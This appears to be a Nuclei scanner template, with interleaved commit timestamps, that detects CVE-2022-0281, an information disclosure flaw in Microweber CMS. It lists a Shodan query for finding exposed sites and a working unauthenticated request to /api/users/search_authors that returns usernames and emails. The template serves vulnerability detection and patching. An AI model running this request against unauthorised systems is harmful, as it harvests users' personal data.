2022-02-06 05:28:32 +00:00
id : CVE-2022-0281
info :
name : Microweber Information Disclosure
author : pikpikcu
severity : high
2022-02-28 20:41:31 +00:00
description : Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
2022-02-06 05:28:32 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
2022-05-17 09:18:12 +00:00
- https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6
- https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505
2022-02-06 18:32:16 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-02-06 18:32:16 +00:00
cve-id : CVE-2022-0281
cwe-id : CWE-200
2023-10-14 11:27:55 +00:00
epss-score : 0.0051
2023-11-14 14:37:18 +00:00
epss-percentile : 0.73876
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : microweber
product : microweber
2023-09-06 11:59:08 +00:00
shodan-query : http.favicon.hash:780351152
2022-08-27 04:41:18 +00:00
tags : cve,cve2022,microweber,disclosure,huntr
2022-02-06 05:28:32 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-06 05:28:32 +00:00
- method : GET
path :
- "{{BaseURL}}/api/users/search_authors"
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"username":'
- '"email":'
- '"display_name":'
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-11-14 16:39:03 +00:00
# digest: 490a0046304402206b85dd4ad965e4e9feed0ba1a414d82d9140e21691bd815f476c164209ae0444022060cc4132356c38a6370a07915f1640ef8c33010694103f79c7420ff48c0666d2:922c64590222798bb761d5b6d8e72950